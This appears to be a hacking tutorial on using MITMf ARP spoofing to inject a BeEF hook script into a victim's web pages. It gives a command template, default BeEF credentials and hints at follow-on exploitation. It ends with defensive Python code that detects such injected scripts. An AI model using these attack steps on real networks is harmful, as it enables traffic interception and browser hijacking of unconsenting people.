Do you remember the last time we used BeEF? Well, now we get to use it again, but this time with MITMf! We are going to auto-inject the hooking script into every webpage the victim visits!
If you don't already have it, install MITMf with apt-get install mitmf (you may want to apt-get update first). If you prefer, you can clone it from the Git repository (git clone https://github.com/byt3bl33d3r/MITMf), but I've had trouble with that version.
BeEF should already be installed in Kali/BackTrack.
Open a new terminal and type cd /usr/share/beef-xss/.
As you can see, BeEF is installed there, and we can run it by typing ./beef. You should get this output:
Do you see the Hook URL? That's important. Remember or copy the URL provided.
Now you can open the BeEF web panel with the UI URL. Once presented with the login page, you should just be able to get in with the default credentials "beef" for both the username and password. Once inside the UI, you should have this screen:
Open up a new terminal. We'll be using MITMf to inject the hooking script. The command format is mitmf --spoof --arp -i <interface> --gateway <router IP> --target <target IP> --inject --js-url <hook.js URL>.
- --spoof loads the spoof plugin
- --arp enables ARP spoofing, so the target's traffic is redirected through your machine
- -i specifies the interface to inject packets on
- --gateway sets the IP of your router to redirect through
- --target sets the IP of the target whose web pages receive the hook.js script
- --inject loads the inject plugin
- --js-url gives the URL of the script to inject, i.e. the BeEF hook URL from above
For instance, I use this command:
Run the command and MITMf should start giving you some output.
MITMf is telling us that it has successfully injected the hook.js script into the websites the target visited.
If we check the BeEF panel, the hooked computer shows up right on the Online Browsers tab.
Remember in my previous XSS posts where I said the victim must stay on the webpage for you to have control of it? Guess what? You don't have to worry about that now! MITMf will continue injecting the script into every website the victim visits, so you'll never lose control!
Now we know what power lies within MITMf... and we can do so much more. From here, you can keep trying to exploit the victim machine, and maybe get a Meterpreter prompt! Ah, the joy of MitM attacks...
NOTE: This only works with non-HSTS websites. You could try the --hsts option, but it may make things too slow and/or glitchy.
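From the defender's side, the injection described above leaves a visible trace: a cleartext HTTP page suddenly carries a script tag whose source is a host that is not the page's own origin (typically a raw IP on the local network). The check below is an added example, not code from the original post or from MITMf/BeEF; the sample response body, the page host news.example.com and the hook URL are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample: an HTTP response body as the victim's browser would
# receive it after a remote script tag has been injected in transit.
# The hook URL is a placeholder, not a real host.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html

<html><head><title>News</title>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
<script src="http://192.0.2.10:3000/hook.js"></script>
</head><body>hello</body></html>"""

# Matches <script ... src="..."> in any attribute order / case.
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.IGNORECASE)
DOTTED_QUAD = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def classify_script(url, page_host, allowlist):
    """Return (url, reasons) if the script is not same-origin or allowlisted,
    otherwise None. Reasons are ordered from most to least suspicious."""
    parsed = urlparse(url)
    if not parsed.netloc:            # relative URL: same origin as the page
        return None
    host = parsed.hostname or ""
    if host == page_host or host in allowlist:
        return None
    reasons = []
    if parsed.scheme == "http":      # script fetched over cleartext HTTP
        reasons.append("cleartext")
    if DOTTED_QUAD.fullmatch(host):  # script served from a bare IP address
        reasons.append("raw-ip")
    reasons.append("foreign-host")   # any other third-party origin
    return url, reasons


def find_foreign_scripts(body, page_host, allowlist=()):
    """Scan one HTML body and list every external script worth a second look."""
    findings = []
    for url in SCRIPT_SRC.findall(body):
        hit = classify_script(url, page_host, set(allowlist))
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for url, reasons in find_foreign_scripts(SAMPLE_RESPONSE, "news.example.com"):
        print(url, ",".join(reasons))
```

Run it over response bodies extracted from a proxy, HAR file or packet capture; a script that is both cleartext and served from a raw IP is the pattern this post's injection produces, and an allowlist keeps legitimate CDNs out of the output.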
C|H of C3